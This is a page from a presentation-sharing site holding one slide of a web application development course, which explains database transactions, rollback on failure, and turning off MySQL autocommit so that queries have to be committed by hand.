Transactions  If the system crashes (or client loses connection) during a transaction, then database is rolled back to the state it was in before the transaction started. The user might have to re-try an action, but the database state remains consistent.  By default, every statement you enter is treated as a transaction comprised of a single query. To disable this, SET `autocommit` = 0; If you disable this, you will need to manually COMMIT; your queries.

Transactions Example

Web Application Development Instructor: Matthew Schurr.

Similar presentations

Presentation on theme: "Web Application Development Instructor: Matthew Schurr."— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

Web Application Development Instructor: Matthew Schurr.

Similar presentations

Presentation on theme: "Web Application Development Instructor: Matthew Schurr."— Presentation transcript:

Similar presentations

About project

Feedback